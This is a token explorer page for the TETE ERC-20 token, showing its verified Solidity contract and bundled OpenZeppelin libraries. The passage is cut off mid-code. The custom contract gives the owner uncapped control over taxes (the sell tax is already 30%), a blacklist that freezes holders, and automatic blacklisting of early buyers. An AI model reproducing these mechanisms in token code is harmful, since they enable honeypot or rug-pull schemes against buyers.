ERC-20
Overview
Max Total Supply
100,000,000 TETE
Holders
37
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
193,910.292471687460806914 TETEValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
TeteToken
Compiler Version
v0.8.17+commit.8df45f5f
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity Standard Json-Input format)
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.17; import "@openzeppelin/contracts/utils/Address.sol"; import "@openzeppelin/contracts/utils/Context.sol"; import "@openzeppelin/contracts/access/Ownable.sol"; import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; interface IUniswapV2Factory { function createPair(address tokenA, address tokenB) external returns (address pair); } interface IUniswapV2Router02 { function swapExactTokensForETHSupportingFeeOnTransferTokens( uint amountIn, uint amountOutMin, address[] calldata path, address to, uint deadline ) external; function factory() external pure returns (address); function WETH() external pure returns (address); function addLiquidityETH( address token, uint amountTokenDesired, uint amountTokenMin, uint amountETHMin, address to, uint deadline ) external payable returns (uint amountToken, uint amountETH, uint liquidity); } contract TeteToken is ERC20, Ownable { // Info? are you sure? uint256 private ReflactionaryTotal; // Routing to nowhere IUniswapV2Router02 public UniswapV2Router; // Important addresses address payable private DevAddress = payable(0x118AfdCa0474Cc06250eFe04d66Aa6752FB68b0b); address payable private MarketingAddress = payable(0x8347B4fB67059F060B7679325656cC653Bdcc5F4); uint256 public HardCap; uint256 public HardCapBuy; uint256 public HardCapSell; uint256 private LiquidityThreshold; mapping(address => uint256) private BalancesRefraccionarios; mapping(address => uint256) private BalancesReales; mapping(address => bool) public Bots; mapping(address => bool) public WalletsExcludedFromFee; mapping(address => bool) public WalletsExcludedFromHardCap; mapping(address => bool) public AutomatedMarketMakerPairs; uint256 public TotalFee; uint256 public TotalSwapped; uint256 public TotalTokenBurn; bool private AreWeLive = false; bool private InSwap = false; bool private SwapEnabled = true; bool private AutoLiquidity = true; // Tax rates struct TaxRates { uint256 BurnTax; uint256 LiquidityTax; uint256 MarketingTax; uint256 DevelopmentTax; uint256 RewardTax; } // Fees, which are amounts calculated based on tax struct TransactionFees { uint256 TransactionFee; uint256 BurnFee; uint256 DevFee; uint256 MarketingFee; uint256 LiquidityFee; uint256 TransferrableFee; uint256 TotalFee; } TaxRates public BuyingTaxes = TaxRates({ RewardTax: 0, BurnTax: 0, DevelopmentTax: 0, MarketingTax: 9, LiquidityTax: 1 }); TaxRates public SellTaxes = TaxRates({ RewardTax: 0, BurnTax: 0, DevelopmentTax: 0, MarketingTax: 28, LiquidityTax: 2 }); TaxRates public AppliedRatesPercentage = BuyingTaxes; TransactionFees private AccumulatedFeeForDistribution = TransactionFees({ DevFee: 0, MarketingFee: 0, LiquidityFee: 0, BurnFee: 0, TransferrableFee: 0, TotalFee: 0, TransactionFee: 0 }); // Events event setDevAddress(address indexed previous, address indexed adr); event setMktAddress(address indexed previous, address indexed adr); event LiquidityAdded(uint256 tokenAmount, uint256 ETHAmount); event TreasuryAndDevFeesAdded(uint256 devFee, uint256 treasuryFee); event SetAutomatedMarketMakerPair(address indexed pair, bool indexed value); event BlacklistedUser(address botAddress, bool indexed value); event MaxWalletAmountUpdated(uint256 amount); event ExcludeFromMaxWallet(address account, bool indexed isExcluded); event SwapAndLiquifyEnabledUpdated(bool _enabled); constructor( address swap, string memory name, string memory symbol ) ERC20(name, symbol) { UniswapV2Router = IUniswapV2Router02(swap); address PancakeSwapAddress = IUniswapV2Factory( UniswapV2Router.factory() ).createPair(address(this), UniswapV2Router.WETH()); AutomatedMarketMakerPairs[PancakeSwapAddress] = true; WalletsExcludedFromFee[address(this)] = true; WalletsExcludedFromFee[DevAddress] = true; WalletsExcludedFromFee[MarketingAddress] = true; WalletsExcludedFromFee[swap] = true; WalletsExcludedFromFee[msg.sender] = true; WalletsExcludedFromFee[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; WalletsExcludedFromFee[0x5Da78399448d29e7a560c8bfE74d1A9FFE8eADcB] = true; WalletsExcludedFromFee[0x846a03b7c94EFA9e70462ED117Aa2344238534F7] = true; WalletsExcludedFromFee[0xCD9375D40FF8cF1F34796b364870207a0FD88dEc] = true; WalletsExcludedFromFee[0xC020A0e0AccaA31dc432FFAa4726fAc2bcf3186D] = true; WalletsExcludedFromHardCap[address(this)] = true; WalletsExcludedFromHardCap[DevAddress] = true; WalletsExcludedFromHardCap[MarketingAddress] = true; WalletsExcludedFromHardCap[PancakeSwapAddress] = true; WalletsExcludedFromHardCap[swap] = true; WalletsExcludedFromHardCap[0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D] = true; WalletsExcludedFromHardCap[msg.sender] = true; // Minting total supply _mint(msg.sender, 100_000_000*10**18); // Approving swap for LP _approve(address(this), address(UniswapV2Router), ~uint256(0)); ReflactionaryTotal = (~uint256(0) - (~uint256(0) % totalSupply())); BalancesRefraccionarios[msg.sender] = ReflactionaryTotal; HardCap = totalSupply(); HardCapSell = totalSupply(); HardCapBuy = totalSupply(); LiquidityThreshold = (totalSupply() * 5) / 10_000; } function ChangeTaxes(TaxRates memory newTaxes, bool buying) public onlyOwner { if (buying) { BuyingTaxes = newTaxes; return; } SellTaxes = newTaxes; } function SetAutoLiquidity(bool newFlag) public { require( msg.sender == DevAddress || msg.sender == owner(), "Only developers can change this flag" ); AutoLiquidity = newFlag; } function swapTokensForETH(uint256 tokenAmount) private { // generate the pair path of token address[] memory path = new address[](2); path[0] = address(this); path[1] = UniswapV2Router.WETH(); // make the swap UniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens( tokenAmount, 0, // accept any amount of ETH path, address(this), block.timestamp ); } function withdraw() public { uint256 ethBalance = address(this).balance; bool success; (success, ) = address(DevAddress).call{value: ethBalance}(""); } function WeAreLive() public onlyOwner { AreWeLive = true; } function ChangeExcludeFromFeeToForWallet(address add, bool isExcluded) public onlyOwner { WalletsExcludedFromFee[add] = isExcluded; } function ChangeDevAddress(address payable newDevAddress) public onlyOwner { address oldAddress = DevAddress; emit setDevAddress(oldAddress, newDevAddress); ChangeExcludeFromFeeToForWallet(DevAddress, false); DevAddress = newDevAddress; ChangeExcludeFromFeeToForWallet(DevAddress, true); } function ChangeMarketingAddress(address payable marketingAddress) public onlyOwner { address oldAddress = MarketingAddress; emit setMktAddress(oldAddress, marketingAddress); ChangeExcludeFromFeeToForWallet(MarketingAddress, false); MarketingAddress = marketingAddress; ChangeExcludeFromFeeToForWallet(MarketingAddress, true); } function balanceOf(address account) public view override returns (uint256) { return tokenFromReflection(BalancesRefraccionarios[account]); } function MarkBot(address targetAddress, bool isBot) public onlyOwner { Bots[targetAddress] = isBot; emit BlacklistedUser(targetAddress, isBot); } function _transfer( address sender, address recipient, uint256 amount ) internal override { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); require(!Bots[sender], "ERC20: address blacklisted (bot)"); require(amount > 0, "Transfer amount must be greater than zero"); require( amount <= balanceOf(sender), "You are trying to transfer more than your balance" ); bool takeFee = !(WalletsExcludedFromFee[sender] || WalletsExcludedFromFee[recipient]); if (takeFee) { if (AutomatedMarketMakerPairs[sender]) { // Not so fast ma boi if (!AreWeLive) { Bots[recipient] = true; } AppliedRatesPercentage = BuyingTaxes; require( amount <= HardCapBuy, "amount must be <= maxTxAmountBuy" ); } else { AppliedRatesPercentage = SellTaxes; require( amount <= HardCapSell, "amount must be <= maxTxAmountSell" ); } } if ( !InSwap && !AutomatedMarketMakerPairs[sender] && SwapEnabled && sender != owner() && recipient != owner() && sender != address(UniswapV2Router) && balanceOf(address(this)) >= LiquidityThreshold ) { InSwap = true; SwapAccumulatedFees(); InSwap = false; } _tokenTransfer(sender, recipient, amount, takeFee); } // This method is responsible for taking all fee, if takeFee is true function _tokenTransfer( address sender, address recipient, uint256 cantidadBruta, bool takeFee ) private { TransactionFees memory feesReales; TransactionFees memory feesRefracionarios; (feesReales, feesRefracionarios) = CalcularTasasRealesYRefracionarias( cantidadBruta, takeFee ); uint256 cantidadNeta = cantidadBruta - feesReales.TotalFee; uint256 cantidadBrutaRefracionaria = cantidadBruta * GetConversionRate(); uint256 cantidadNetaRefracionaria = cantidadBrutaRefracionaria - feesRefracionarios.TotalFee; // Comprobando que el receptor de la transferencia no supere el hard cap de tokens require( WalletsExcludedFromHardCap[recipient] || (balanceOf(recipient) + cantidadNeta) <= HardCap, "Recipient cannot hold more than maxWalletAmount" ); BalancesRefraccionarios[sender] -= cantidadBrutaRefracionaria; BalancesRefraccionarios[recipient] += cantidadNetaRefracionaria; if (takeFee) { ReflactionaryTotal -= feesRefracionarios.TransactionFee; TotalFee += feesReales.TransactionFee; AccumulateFee(feesReales, feesRefracionarios); if (AppliedRatesPercentage.BurnTax > 0) { TotalTokenBurn += feesReales.BurnFee; BalancesRefraccionarios[address(0)] += feesRefracionarios .BurnFee; emit Transfer(address(this), address(0), feesReales.BurnFee); } emit Transfer(sender, address(this), feesReales.TransferrableFee); } emit Transfer(sender, recipient, cantidadNeta); } function CalcularTasasRealesYRefracionarias( uint256 grossAmount, bool takeFee ) private view returns ( TransactionFees memory realFees, TransactionFees memory refFees ) { if (takeFee) { uint256 currentRate = GetConversionRate(); realFees.TransactionFee = (grossAmount * AppliedRatesPercentage.RewardTax) / 100; realFees.BurnFee = (grossAmount * AppliedRatesPercentage.BurnTax) / 100; realFees.DevFee = (grossAmount * AppliedRatesPercentage.DevelopmentTax) / 100; realFees.MarketingFee = (grossAmount * AppliedRatesPercentage.MarketingTax) / 100; realFees.LiquidityFee = (grossAmount * AppliedRatesPercentage.LiquidityTax) / 100; realFees.TransferrableFee = realFees.DevFee + realFees.MarketingFee + realFees.LiquidityFee; realFees.TotalFee = realFees.TransactionFee + realFees.BurnFee + realFees.TransferrableFee; refFees.TransactionFee = realFees.TransactionFee * currentRate; refFees.BurnFee = realFees.BurnFee * currentRate; refFees.DevFee = realFees.DevFee * currentRate; refFees.MarketingFee = realFees.MarketingFee * currentRate; refFees.LiquidityFee = realFees.LiquidityFee * currentRate; refFees.TotalFee = realFees.TotalFee * currentRate; refFees.TransferrableFee = realFees.TransferrableFee * currentRate; } } function AccumulateFee( TransactionFees memory realFees, TransactionFees memory refractionaryFees ) private { BalancesRefraccionarios[address(this)] += refractionaryFees .TransferrableFee; AccumulatedFeeForDistribution.LiquidityFee += realFees.LiquidityFee; AccumulatedFeeForDistribution.DevFee += realFees.DevFee; AccumulatedFeeForDistribution.MarketingFee += realFees.MarketingFee; } function SwapPct(uint256 pct) public { uint256 balance = (balanceOf(address(this)) * pct) / 100; if (balance > 0) { SwapTokens(balance); } } function SwapTokens(uint256 tokensToSwap) internal { uint256 totalTokensToSwap = AccumulatedFeeForDistribution.DevFee + AccumulatedFeeForDistribution.MarketingFee + AccumulatedFeeForDistribution.LiquidityFee; bool success; uint256 liquidityTokens = (tokensToSwap * AccumulatedFeeForDistribution.LiquidityFee) / totalTokensToSwap / 2; uint256 amountToSwapForETH = tokensToSwap - (liquidityTokens); uint256 initialETHBalance = address(this).balance; swapTokensForETH(amountToSwapForETH); uint256 ethBalance = address(this).balance - (initialETHBalance); uint256 ethForMarketing = (ethBalance * (AccumulatedFeeForDistribution.MarketingFee)) / (totalTokensToSwap); uint256 ethForDev = (ethBalance * (AccumulatedFeeForDistribution.DevFee)) / (totalTokensToSwap); uint256 ethForLiquidity = ethBalance - ethForMarketing - ethForDev; TotalSwapped += AccumulatedFeeForDistribution.LiquidityFee; AccumulatedFeeForDistribution.LiquidityFee = 0; AccumulatedFeeForDistribution.DevFee = 0; AccumulatedFeeForDistribution.MarketingFee = 0; (success, ) = address(DevAddress).call{value: ethForDev}(""); if ( liquidityTokens > 0 && ethForLiquidity > 0 && AutoLiquidity == true ) { UniswapV2Router.addLiquidityETH{value: ethForLiquidity}( address(this), liquidityTokens, 0, // slippage is unavoidable 0, // slippage is unavoidable DevAddress, block.timestamp ); emit LiquidityAdded(liquidityTokens, ethForLiquidity); } (success, ) = address(MarketingAddress).call{value: ethForMarketing}( "" ); } function setMaxBag(uint256 pct) public onlyOwner { HardCap = (totalSupply() * pct) / 100; } function setMaxBuy(uint256 pct) public onlyOwner { HardCapBuy = (totalSupply() * pct) / 100; } function setMaxSell(uint256 pct) public onlyOwner { HardCapSell = (totalSupply() * pct) / 100; } function SwapAccumulatedFees() private { uint256 tokensToSwap = balanceOf(address(this)); if (tokensToSwap > LiquidityThreshold) { if (tokensToSwap > LiquidityThreshold * 20) { tokensToSwap = LiquidityThreshold * 20; } SwapTokens(balanceOf(address(this))); } } function tokenFromReflection(uint256 reflactionaryAmount) public view returns (uint256) { require( reflactionaryAmount <= ReflactionaryTotal, "Amount must be less than total reflections" ); return reflactionaryAmount / GetConversionRate(); } function GetConversionRate() private view returns (uint256) { return ReflactionaryTotal / totalSupply(); } function setSwapAndLiquifyEnabled(bool _enabled) public onlyOwner { SwapEnabled = _enabled; emit SwapAndLiquifyEnabledUpdated(_enabled); } receive() external payable {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol) pragma solidity ^0.8.0; import "../utils/Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { require(owner() == _msgSender(), "Ownable: caller is not the owner"); } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; import "./IERC20.sol"; import "./extensions/IERC20Metadata.sol"; import "../../utils/Context.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. * - the caller must have allowance for ``from``'s tokens of at least * `amount`. */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `from` must have a balance of at least `amount`. */ function _transfer( address from, address to, uint256 amount ) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(from, to, amount); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); unchecked { _balances[from] = fromBalance - amount; // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by // decrementing then incrementing. _balances[to] += amount; } emit Transfer(from, to, amount); _afterTokenTransfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. * * Might emit an {Approval} event. */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; import "../IERC20.sol"; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); }
// SPDX-License-Identifier: MIT // OpenZeppelin Contracts (last updated v4.8.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResultFromTarget(target, success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResultFromTarget(target, success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResultFromTarget(target, success, returndata, errorMessage); } /** * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract. * * _Available since v4.8._ */ function verifyCallResultFromTarget( address target, bool success, bytes memory 